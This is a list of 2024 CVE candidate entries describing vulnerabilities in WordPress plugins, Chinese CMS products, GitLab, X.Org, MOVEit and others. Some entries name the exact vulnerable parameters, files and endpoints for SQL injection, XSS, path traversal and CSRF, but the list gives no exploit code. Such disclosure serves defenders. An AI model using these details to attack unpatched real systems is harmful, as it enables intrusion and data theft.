CVE 2024 431 Candidate The Gestpay for WooCommerce plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 20221130. This is due to missing or incorrect nonce validation on the 'ajax_set_default_card' function. This makes it possible for unauthenticated attackers to set the default card token for a user via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. MISC:https://plugins.trac.wordpress.org/browser/gestpay-for-woocommerce/trunk/inc/class-gestpay-cards.php#L117 | URL:https://plugins.trac.wordpress.org/browser/gestpay-for-woocommerce/trunk/inc/class-gestpay-cards.php#L117 | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/7d3a6650-5be0-4162-93eb-369538a2ebc5?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/7d3a6650-5be0-4162-93eb-369538a2ebc5?source=cve Assigned (20240111)
CVE 2024 430 Candidate IObit Malware Fighter v11.0.0.1274 is vulnerable to a Denial of Service vulnerability by triggering the 0x8001E00C IOCTL code of the ImfHpRegFilter.sys driver. MISC:https://fluidattacks.com/advisories/davis/ | URL:https://fluidattacks.com/advisories/davis/ | MISC:https://www.iobit.com/en/malware-fighter.php | URL:https://www.iobit.com/en/malware-fighter.php Assigned (20240111)
CVE 2024 429 Candidate A denial service vulnerability has been found on Hex Workshop affecting version 6.7, an attacker could send a command line file arguments and control the Structured Exception Handler (SEH) records resulting in a service shutdown. MISC:https://https://www.incibe.es/en/incibe-cert/notices/aviso/buffer-overflow-vulnerability-hex-workshop | URL:https://https://www.incibe.es/en/incibe-cert/notices/aviso/buffer-overflow-vulnerability-hex-workshop Assigned (20240111)
CVE 2024 428 Candidate The Index Now plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.6.3. This is due to missing or incorrect nonce validation on the 'reset_form' function. This makes it possible for unauthenticated attackers to delete arbitrary site options via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. MISC:https://plugins.trac.wordpress.org/changeset/3020958/mihdan-index-now/tags/2.6.4/src/Views/WPOSA.php | URL:https://plugins.trac.wordpress.org/changeset/3020958/mihdan-index-now/tags/2.6.4/src/Views/WPOSA.php | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/c7641d52-e930-4143-9180-2903d018da91?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/c7641d52-e930-4143-9180-2903d018da91?source=cve Assigned (20240111)
CVE 2024 426 Candidate A vulnerability, which was classified as critical, has been found in ForU CMS up to 2020-06-23. This issue affects some unknown processing of the file admin/cms_template.php. The manipulation of the argument t_name/t_path leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250445 was assigned to this vulnerability. MISC:https://github.com/mi2acle/forucmsvuln/blob/master/sqli.md | URL:https://github.com/mi2acle/forucmsvuln/blob/master/sqli.md | MISC:https://vuldb.com/?ctiid.250445 | URL:https://vuldb.com/?ctiid.250445 | MISC:https://vuldb.com/?id.250445 | URL:https://vuldb.com/?id.250445 Assigned (20240111)
CVE 2024 425 Candidate A vulnerability classified as critical was found in ForU CMS up to 2020-06-23. This vulnerability affects unknown code of the file /admin/index.php?act=reset_admin_psw. The manipulation leads to weak password recovery. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250444. MISC:https://github.com/mi2acle/forucmsvuln/blob/master/passwordreset.md | URL:https://github.com/mi2acle/forucmsvuln/blob/master/passwordreset.md | MISC:https://vuldb.com/?ctiid.250444 | URL:https://vuldb.com/?ctiid.250444 | MISC:https://vuldb.com/?id.250444 | URL:https://vuldb.com/?id.250444 Assigned (20240111)
CVE 2024 424 Candidate A vulnerability classified as problematic has been found in CodeAstro Simple Banking System 1.0. This affects an unknown part of the file createuser.php of the component Create a User Page. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250443. MISC:https://drive.google.com/file/d/1jr5YRrESDjcNmhpQRK5yHvvxNlYJp2oK/view?usp=sharing | URL:https://drive.google.com/file/d/1jr5YRrESDjcNmhpQRK5yHvvxNlYJp2oK/view?usp=sharing | MISC:https://vuldb.com/?ctiid.250443 | URL:https://vuldb.com/?ctiid.250443 | MISC:https://vuldb.com/?id.250443 | URL:https://vuldb.com/?id.250443 Assigned (20240111)
CVE 2024 423 Candidate A vulnerability was found in CodeAstro Online Food Ordering System 1.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the file dishes.php. The manipulation of the argument res_id leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-250442 is the identifier assigned to this vulnerability. MISC:https://drive.google.com/file/d/1SaHrOPMV6yrBaS5pA7MOX8nsiVGxvlOa/view?usp=sharing | URL:https://drive.google.com/file/d/1SaHrOPMV6yrBaS5pA7MOX8nsiVGxvlOa/view?usp=sharing | MISC:https://vuldb.com/?ctiid.250442 | URL:https://vuldb.com/?ctiid.250442 | MISC:https://vuldb.com/?id.250442 | URL:https://vuldb.com/?id.250442 Assigned (20240111)
CVE 2024 422 Candidate A vulnerability was found in CodeAstro POS and Inventory Management System 1.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /new_item of the component New Item Creation Page. The manipulation of the argument new_item leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250441 was assigned to this vulnerability. MISC:https://drive.google.com/file/d/1_CoeXcCC8fXzKJO-Xvjuq1qYtf8QKHaM/view?usp=sharing | URL:https://drive.google.com/file/d/1_CoeXcCC8fXzKJO-Xvjuq1qYtf8QKHaM/view?usp=sharing | MISC:https://vuldb.com/?ctiid.250441 | URL:https://vuldb.com/?ctiid.250441 | MISC:https://vuldb.com/?id.250441 | URL:https://vuldb.com/?id.250441 Assigned (20240111)
CVE 2024 421 Candidate The MapPress Maps for WordPress plugin before 2.88.16 does not ensure that posts to be retrieve via an AJAX action is a public map, allowing unauthenticated users to read arbitrary private and draft posts. MISC:https://wpscan.com/vulnerability/587acc47-1966-4baf-a380-6aa479a97c82/ | URL:https://wpscan.com/vulnerability/587acc47-1966-4baf-a380-6aa479a97c82/ Assigned (20240111)
CVE 2024 420 Candidate The MapPress Maps for WordPress plugin before 2.88.15 does not sanitize and escape the map title when outputting it back in the admin dashboard, allowing Contributors and above roles to perform Stored Cross-Site Scripting attacks MISC:https://wpscan.com/vulnerability/b6187ef8-70f4-4911-abd7-42bf6b7e54b7/ | URL:https://wpscan.com/vulnerability/b6187ef8-70f4-4911-abd7-42bf6b7e54b7/ Assigned (20240111)
CVE 2024 419 Candidate A vulnerability was found in Jasper httpdx up to 1.5.4 and classified as problematic. This issue affects some unknown processing of the component HTTP POST Request Handler. The manipulation leads to denial of service. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250439. MISC:https://cxsecurity.com/issue/WLB-2024010027 | URL:https://cxsecurity.com/issue/WLB-2024010027 | MISC:https://vuldb.com/?ctiid.250439 | URL:https://vuldb.com/?ctiid.250439 | MISC:https://vuldb.com/?id.250439 | URL:https://vuldb.com/?id.250439 | MISC:https://www.youtube.com/watch?v=6dAWGH0-6TY | URL:https://www.youtube.com/watch?v=6dAWGH0-6TY Assigned (20240111)
CVE 2024 418 Candidate A vulnerability has been found in iSharer and upRedSun File Sharing Wizard up to 1.5.0 and classified as problematic. This vulnerability affects unknown code of the component GET Request Handler. The manipulation leads to denial of service. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-250438 is the identifier assigned to this vulnerability. MISC:https://cxsecurity.com/issue/WLB-2024010023 | URL:https://cxsecurity.com/issue/WLB-2024010023 | MISC:https://vuldb.com/?ctiid.250438 | URL:https://vuldb.com/?ctiid.250438 | MISC:https://vuldb.com/?id.250438 | URL:https://vuldb.com/?id.250438 | MISC:https://www.youtube.com/watch?v=WK7xK9KHiMU | URL:https://www.youtube.com/watch?v=WK7xK9KHiMU Assigned (20240111)
CVE 2024 417 Candidate A vulnerability, which was classified as critical, was found in DeShang DSShop up to 2.1.5. This affects an unknown part of the file application/home/controller/MemberAuth.php. The manipulation of the argument member_info leads to path traversal: '../filedir'. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250437 was assigned to this vulnerability. MISC:https://note.zhaoj.in/share/ZpRTCLblKd7N | URL:https://note.zhaoj.in/share/ZpRTCLblKd7N | MISC:https://vuldb.com/?ctiid.250437 | URL:https://vuldb.com/?ctiid.250437 | MISC:https://vuldb.com/?id.250437 | URL:https://vuldb.com/?id.250437 Assigned (20240111)
CVE 2024 416 Candidate A vulnerability, which was classified as critical, has been found in DeShang DSMall up to 5.0.3. Affected by this issue is some unknown functionality of the file application/home/controller/MemberAuth.php. The manipulation of the argument file_name leads to path traversal: '../filedir'. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250436. MISC:https://note.zhaoj.in/share/DxR7FZsCKJQ1 | URL:https://note.zhaoj.in/share/DxR7FZsCKJQ1 | MISC:https://vuldb.com/?ctiid.250436 | URL:https://vuldb.com/?ctiid.250436 | MISC:https://vuldb.com/?id.250436 | URL:https://vuldb.com/?id.250436 Assigned (20240111)
CVE 2024 415 Candidate A vulnerability classified as critical was found in DeShang DSMall up to 6.1.0. Affected by this vulnerability is an unknown functionality of the file application/home/controller/TaobaoExport.php of the component Image URL Handler. The manipulation leads to improper access controls. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250435. MISC:https://note.zhaoj.in/share/63LhFitJmKGR | URL:https://note.zhaoj.in/share/63LhFitJmKGR | MISC:https://vuldb.com/?ctiid.250435 | URL:https://vuldb.com/?ctiid.250435 | MISC:https://vuldb.com/?id.250435 | URL:https://vuldb.com/?id.250435 Assigned (20240111)
CVE 2024 414 Candidate A vulnerability classified as problematic has been found in DeShang DSCMS up to 3.1.2/7.1. Affected is an unknown function of the file public/install.php. The manipulation leads to improper access controls. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-250434 is the identifier assigned to this vulnerability. MISC:https://note.zhaoj.in/share/xYQMsARg83ui | URL:https://note.zhaoj.in/share/xYQMsARg83ui | MISC:https://vuldb.com/?ctiid.250434 | URL:https://vuldb.com/?ctiid.250434 | MISC:https://vuldb.com/?id.250434 | URL:https://vuldb.com/?id.250434 Assigned (20240111)
CVE 2024 413 Candidate A vulnerability was found in DeShang DSKMS up to 3.1.2. It has been rated as problematic. This issue affects some unknown processing of the file public/install.php. The manipulation leads to improper access controls. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250433 was assigned to this vulnerability. MISC:https://note.zhaoj.in/share/MarH4fY66BgO | URL:https://note.zhaoj.in/share/MarH4fY66BgO | MISC:https://vuldb.com/?ctiid.250433 | URL:https://vuldb.com/?ctiid.250433 | MISC:https://vuldb.com/?id.250433 | URL:https://vuldb.com/?id.250433 Assigned (20240111)
CVE 2024 412 Candidate A vulnerability was found in DeShang DSShop up to 3.1.0. It has been declared as problematic. This vulnerability affects unknown code of the file public/install.php of the component HTTP GET Request Handler. The manipulation leads to improper access controls. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250432. MISC:https://note.zhaoj.in/share/Q56cf5nN9RzF | URL:https://note.zhaoj.in/share/Q56cf5nN9RzF | MISC:https://vuldb.com/?ctiid.250432 | URL:https://vuldb.com/?ctiid.250432 | MISC:https://vuldb.com/?id.250432 | URL:https://vuldb.com/?id.250432 Assigned (20240111)
CVE 2024 411 Candidate A vulnerability was found in DeShang DSMall up to 6.1.0. It has been classified as problematic. This affects an unknown part of the file public/install.php of the component HTTP GET Request Handler. The manipulation leads to improper access controls. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250431. MISC:https://note.zhaoj.in/share/9G6K6RBjS4M4 | URL:https://note.zhaoj.in/share/9G6K6RBjS4M4 | MISC:https://vuldb.com/?ctiid.250431 | URL:https://vuldb.com/?ctiid.250431 | MISC:https://vuldb.com/?id.250431 | URL:https://vuldb.com/?id.250431 Assigned (20240111)
CVE 2024 410 Candidate An authorization bypass vulnerability was discovered in GitLab affecting versions 15.1 prior to 16.7.6, 16.8 prior to 16.8.3, and 16.9 prior to 16.9.1. A developer could bypass CODEOWNERS approvals by creating a merge conflict. MISC:GitLab Issue #437988 | URL:https://gitlab.com/gitlab-org/gitlab/-/issues/437988 | MISC:HackerOne Bug Bounty Report #2296778 | URL:https://hackerone.com/reports/2296778 Assigned (20240111)
CVE 2024 409 Candidate A flaw was found in the X.Org server. The cursor code in both Xephyr and Xwayland uses the wrong type of private at creation. It uses the cursor bits type with the cursor as private, and when initiating the cursor, that overwrites the XSELINUX context. CONFIRM:https://security.netapp.com/advisory/ntap-20240307-0006/ | FEDORA:FEDORA-2024-05db4bcbec | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IZ75X54CN4IFYMIV7OK3JVZ57FHQIGIC/ | GENTOO:GLSA-202401-30 | URL:https://security.gentoo.org/glsa/202401-30 | MISC:RHBZ#2257690 | URL:https://bugzilla.redhat.com/show_bug.cgi?id=2257690 | MISC:RHSA-2024:0320 | URL:https://access.redhat.com/errata/RHSA-2024:0320 | MISC:https://access.redhat.com/security/cve/CVE-2024-0409 | URL:https://access.redhat.com/security/cve/CVE-2024-0409 | MISC:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5J4H7CH565ALSZZYKOJFYDA5KFLG6NUK/ | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5J4H7CH565ALSZZYKOJFYDA5KFLG6NUK/ | MISC:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EJBMCWQ54R6ZL3MYU2D2JBW6JMZL7BQW/ | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EJBMCWQ54R6ZL3MYU2D2JBW6JMZL7BQW/ | MLIST:[debian-lts-announce] 20240125 [SECURITY] [DLA 3721-1] xorg-server security update | URL:https://lists.debian.org/debian-lts-announce/2024/01/msg00016.html Assigned (20240110)
CVE 2024 408 Candidate A flaw was found in the X.Org server. The GLX PBuffer code does not call the XACE hook when creating the buffer, leaving it unlabeled. When the client issues another request to access that resource (as with a GetGeometry) or when it creates another resource that needs to access that buffer, such as a GC, the XSELINUX code will try to use an object that was never labeled and crash because the SID is NULL. CONFIRM:https://security.netapp.com/advisory/ntap-20240307-0006/ | FEDORA:FEDORA-2024-05db4bcbec | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IZ75X54CN4IFYMIV7OK3JVZ57FHQIGIC/ | GENTOO:GLSA-202401-30 | URL:https://security.gentoo.org/glsa/202401-30 | MISC:RHBZ#2257689 | URL:https://bugzilla.redhat.com/show_bug.cgi?id=2257689 | MISC:RHSA-2024:0320 | URL:https://access.redhat.com/errata/RHSA-2024:0320 | MISC:https://access.redhat.com/security/cve/CVE-2024-0408 | URL:https://access.redhat.com/security/cve/CVE-2024-0408 | MISC:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5J4H7CH565ALSZZYKOJFYDA5KFLG6NUK/ | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5J4H7CH565ALSZZYKOJFYDA5KFLG6NUK/ | MISC:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EJBMCWQ54R6ZL3MYU2D2JBW6JMZL7BQW/ | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EJBMCWQ54R6ZL3MYU2D2JBW6JMZL7BQW/ | MLIST:[debian-lts-announce] 20240125 [SECURITY] [DLA 3721-1] xorg-server security update | URL:https://lists.debian.org/debian-lts-announce/2024/01/msg00016.html Assigned (20240110)
CVE 2024 407 Candidate Certain HP Enterprise LaserJet, and HP LaserJet Managed Printers are potentially vulnerable to information disclosure, when connections made by the device back to services enabled by some solutions may have been trusted without the appropriate CA certificate in the device's certificate store. MISC:https://support.hp.com/us-en/document/ish_10174094-10174120-16 | URL:https://support.hp.com/us-en/document/ish_10174094-10174120-16 Assigned (20240110)
CVE 2024 405 Candidate The Burst Statistics – Privacy-Friendly Analytics for WordPress plugin, version 1.5.3, is vulnerable to Post-Authenticated SQL Injection via multiple JSON parameters in the /wp-json/burst/v1/data/compare endpoint. Affected parameters include 'browser', 'device', 'page_id', 'page_url', 'platform', and 'referrer'. This vulnerability arises due to insufficient escaping of user-supplied parameters and the lack of adequate preparation in SQL queries. As a result, authenticated attackers with editor access or higher can append additional SQL queries into existing ones, potentially leading to unauthorized access to sensitive information from the database. MISC:https://plugins.trac.wordpress.org/browser/burst-statistics/trunk/statistics/class-statistics.php?rev=3011996#L380 | URL:https://plugins.trac.wordpress.org/browser/burst-statistics/trunk/statistics/class-statistics.php?rev=3011996#L380 | MISC:https://plugins.trac.wordpress.org/browser/burst-statistics/trunk/statistics/class-statistics.php?rev=3011996#L926 | URL:https://plugins.trac.wordpress.org/browser/burst-statistics/trunk/statistics/class-statistics.php?rev=3011996#L926 | MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3020809%40burst-statistics%2Ftrunk&old=3012004%40burst-statistics%2Ftrunk&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3020809%40burst-statistics%2Ftrunk&old=3012004%40burst-statistics%2Ftrunk&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/e349f07d-a520-4700-a6e0-25e68c1deeae?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/e349f07d-a520-4700-a6e0-25e68c1deeae?source=cve Assigned (20240110)
CVE 2024 403 Candidate Recipes version 1.5.10 allows arbitrary HTTP requests to be made through the server. This is possible because the application is vulnerable to SSRF. MISC:https://fluidattacks.com/advisories/harris/ | URL:https://fluidattacks.com/advisories/harris/ | MISC:https://github.com/TandoorRecipes/recipes/ | URL:https://github.com/TandoorRecipes/recipes/ Assigned (20240110)
CVE 2024 402 Candidate An issue has been discovered in GitLab CE/EE affecting all versions from 16.0 prior to 16.6.6, 16.7 prior to 16.7.4, and 16.8 prior to 16.8.1 which allows an authenticated user to write files to arbitrary locations on the GitLab server while creating a workspace. MISC:GitLab Issue #437819 | URL:https://gitlab.com/gitlab-org/gitlab/-/issues/437819 | MISC:https://about.gitlab.com/releases/2024/01/25/critical-security-release-gitlab-16-8-1-released/ | URL:https://about.gitlab.com/releases/2024/01/25/critical-security-release-gitlab-16-8-1-released/ Assigned (20240110)
CVE 2024 396 Candidate In Progress MOVEit Transfer versions released before 2022.0.10 (14.0.10), 2022.1.11 (14.1.11), 2023.0.8 (15.0.8), 2023.1.3 (15.1.3), an input validation issue was discovered. An authenticated user can manipulate a parameter in an HTTPS transaction. The modified transaction could lead to computational errors within MOVEit Transfer and potentially result in a denial of service. MISC:https://community.progress.com/s/article/MOVEit-Transfer-Service-Pack-January-2024 | URL:https://community.progress.com/s/article/MOVEit-Transfer-Service-Pack-January-2024 | MISC:https://www.progress.com/moveit | URL:https://www.progress.com/moveit Assigned (20240110)
CVE 2024 395 Candidate ** REJECT ** NON Security Issue. Assigned (20240110)
CVE 2024 390 Candidate INPRAX "iZZi connect" application on Android contains hard-coded MQTT queue credentials. The same MQTT queue is used by corresponding physical recuperation devices. Exploiting this vulnerability could potentially allow unauthorized access to manage and read parameters of the recuperation unit "reQnet iZZi".This issue affects "iZZi connect" application versions before 2024010401. MISC:https://cert.pl/en/posts/2024/02/CVE-2024-0390/ | URL:https://cert.pl/en/posts/2024/02/CVE-2024-0390/ | MISC:https://cert.pl/posts/2024/02/CVE-2024-0390/ | URL:https://cert.pl/posts/2024/02/CVE-2024-0390/ Assigned (20240110)
CVE 2024 389 Candidate A vulnerability, which was classified as critical, was found in SourceCodester Student Attendance System 1.0. Affected is an unknown function of the file attendance_report.php. The manipulation of the argument class_id leads to sql injection. The exploit has been disclosed to the public and may be used. VDB-250230 is the identifier assigned to this vulnerability. MISC:https://drive.google.com/file/d/1Vi-IGjAZbitDqEvmd9ONrxE0MgB8-v1I/view?usp=sharing | URL:https://drive.google.com/file/d/1Vi-IGjAZbitDqEvmd9ONrxE0MgB8-v1I/view?usp=sharing | MISC:https://vuldb.com/?ctiid.250230 | URL:https://vuldb.com/?ctiid.250230 | MISC:https://vuldb.com/?id.250230 | URL:https://vuldb.com/?id.250230 Assigned (20240110)
CVE 2024 387 Candidate The EDS-4000/G4000 Series prior to version 3.2 includes IP forwarding capabilities that users cannot deactivate. An attacker may be able to send requests to the product and have it forwarded to the target. An attacker can bypass access controls or hide the source of malicious requests. MISC:https://www.moxa.com/en/support/product-support/security-advisory/mpsa-237129-eds-4000-g4000-series-ip-forwarding-vulnerability?viewmode=0 | URL:https://www.moxa.com/en/support/product-support/security-advisory/mpsa-237129-eds-4000-g4000-series-ip-forwarding-vulnerability?viewmode=0 Assigned (20240110)
CVE 2024 386 Candidate The weForms plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'Referer' HTTP header in all versions up to, and including, 1.6.21 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3047406%40weforms&new=3047406%40weforms&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3047406%40weforms&new=3047406%40weforms&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/f436ab65-a59c-4b2a-abc8-a7fc038678dd?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/f436ab65-a59c-4b2a-abc8-a7fc038678dd?source=cve Assigned (20240109)
CVE 2024 385 Candidate The Categorify plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the categorifyAjaxAddCategory function in all versions up to, and including, 1.0.7.4. This makes it possible for authenticated attackers, with subscriber-level access and above, to add categories. MISC:https://plugins.trac.wordpress.org/changeset/3034410/categorify | URL:https://plugins.trac.wordpress.org/changeset/3034410/categorify | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/1c7c74cf-a109-4f77-a740-5a43ccd4e96a?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/1c7c74cf-a109-4f77-a740-5a43ccd4e96a?source=cve Assigned (20240109)
CVE 2024 384 Candidate The WP Recipe Maker plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Recipe Notes in all versions up to, and including, 9.1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3019769%40wp-recipe-maker&new=3019769%40wp-recipe-maker&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3019769%40wp-recipe-maker&new=3019769%40wp-recipe-maker&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/749c5d09-1e9a-4aa1-b7c2-6f9d24f3a09b?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/749c5d09-1e9a-4aa1-b7c2-6f9d24f3a09b?source=cve Assigned (20240109)
CVE 2024 382 Candidate The WP Recipe Maker plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 9.1.0 due to unrestricted use of the 'header_tag' attribute. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/changeset/3019769/wp-recipe-maker/trunk/includes/public/shortcodes/class-wprm-shortcode-helper.php | URL:https://plugins.trac.wordpress.org/changeset/3019769/wp-recipe-maker/trunk/includes/public/shortcodes/class-wprm-shortcode-helper.php | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/1f463ed1-06ad-430f-b450-1a73dc54f8a7?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/1f463ed1-06ad-430f-b450-1a73dc54f8a7?source=cve Assigned (20240109)
CVE 2024 381 Candidate The WP Recipe Maker plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the use of the 'tag' attribute in the wprm-recipe-name, wprm-recipe-date, and wprm-recipe-counter shortcodes in all versions up to, and including, 9.1.0. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/changeset/3019769/wp-recipe-maker/trunk/includes/public/shortcodes/recipe/class-wprm-sc-counter.php | URL:https://plugins.trac.wordpress.org/changeset/3019769/wp-recipe-maker/trunk/includes/public/shortcodes/recipe/class-wprm-sc-counter.php | MISC:https://plugins.trac.wordpress.org/changeset/3019769/wp-recipe-maker/trunk/includes/public/shortcodes/recipe/class-wprm-sc-date.php | URL:https://plugins.trac.wordpress.org/changeset/3019769/wp-recipe-maker/trunk/includes/public/shortcodes/recipe/class-wprm-sc-date.php | MISC:https://plugins.trac.wordpress.org/changeset/3019769/wp-recipe-maker/trunk/includes/public/shortcodes/recipe/class-wprm-sc-name.php | URL:https://plugins.trac.wordpress.org/changeset/3019769/wp-recipe-maker/trunk/includes/public/shortcodes/recipe/class-wprm-sc-name.php | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/a7c949f0-fcd1-4984-95a2-b19fb72f04bb?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/a7c949f0-fcd1-4984-95a2-b19fb72f04bb?source=cve Assigned (20240109)
CVE 2024 380 Candidate The WP Recipe Maker plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 9.1.0 via the 'icon' attribute used in Shortcodes. This makes it possible for authenticated attackers, with contributor-level access and above, to include the contents of SVG files on the server, which can be leveraged for Cross-Site Scripting. MISC:https://plugins.trac.wordpress.org/changeset/3019769/wp-recipe-maker/trunk/includes/public/class-wprm-icon.php | URL:https://plugins.trac.wordpress.org/changeset/3019769/wp-recipe-maker/trunk/includes/public/class-wprm-icon.php | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/457c4e56-c2a0-451f-a4a6-e7fb7bf7b0e0?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/457c4e56-c2a0-451f-a4a6-e7fb7bf7b0e0?source=cve Assigned (20240109)
CVE 2024 379 Candidate The Custom Twitter Feeds – A Tweets Widget or X Feed Widget plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.2.1. This is due to missing or incorrect nonce validation on the ctf_auto_save_tokens function. This makes it possible for unauthenticated attackers to update the site's twitter API token and secret via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. MISC:https://plugins.trac.wordpress.org/browser/custom-twitter-feeds/trunk/custom-twitter-feed.php | URL:https://plugins.trac.wordpress.org/browser/custom-twitter-feeds/trunk/custom-twitter-feed.php | MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3032345%40custom-twitter-feeds%2Ftrunk&new=3032345%40custom-twitter-feeds%2Ftrunk&sfp_email=&sfph_mail=#file3 | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3032345%40custom-twitter-feeds%2Ftrunk&new=3032345%40custom-twitter-feeds%2Ftrunk&sfp_email=&sfph_mail=#file3 | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/29e2ff11-053b-45cc-adf1-d276f1ee576e?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/29e2ff11-053b-45cc-adf1-d276f1ee576e?source=cve Assigned (20240109)
CVE 2024 378 Candidate The AI Engine: Chatbots, Generators, Assistants, GPT 4 and more! plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the AI chat data when discussion tracking is enabled in all versions up to, and including, 2.2.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3043570%40ai-engine&new=3043570%40ai-engine&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3043570%40ai-engine&new=3043570%40ai-engine&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/54344300-6288-40bc-b539-3dc9b555ed00?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/54344300-6288-40bc-b539-3dc9b555ed00?source=cve Assigned (20240109)
CVE 2024 377 Candidate The LifterLMS – WordPress LMS Plugin for eLearning plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'process_review' function in all versions up to, and including, 7.5.1. This makes it possible for unauthenticated attackers to publish an unrestricted number of reviews on the site. MISC:https://plugins.trac.wordpress.org/changeset/3036762/lifterlms/tags/7.5.2/includes/class.llms.review.php?old=2903997&old_path=lifterlms/trunk/includes/class.llms.review.php | URL:https://plugins.trac.wordpress.org/changeset/3036762/lifterlms/tags/7.5.2/includes/class.llms.review.php?old=2903997&old_path=lifterlms/trunk/includes/class.llms.review.php | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/d1f41400-5c59-444d-9c1e-121e83449521?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/d1f41400-5c59-444d-9c1e-121e83449521?source=cve Assigned (20240109)
